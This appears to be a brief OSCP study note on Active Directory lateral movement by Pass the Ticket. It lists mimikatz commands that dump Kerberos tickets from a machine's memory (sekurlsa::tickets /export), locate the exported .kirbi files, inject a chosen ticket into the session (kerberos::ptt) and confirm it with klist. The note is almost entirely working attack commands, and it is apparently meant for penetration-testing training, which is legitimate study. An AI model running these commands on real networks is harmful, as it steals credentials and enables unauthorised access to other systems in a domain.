// notes/ Active Directory
🏛️
Lateral Movement Pass The Ticket
Export all tickets on the machine using mimikatz
#active directory#adot8
source · oscp.adot8.com · active-directory/lateral-movement_pass-the-ticket ↗Pass the Ticket
Export all tickets on the machine using mimikatz
code
01privilege::debug02sekurlsa::tickets /export03exitcode
01dir *.kirbiBack in mimikatz pass the ticket using the tickets name
code
01kerberos::ptt [0;12bd0]-0-0-40810000-adot@cifs-web04.kirbicode
01klist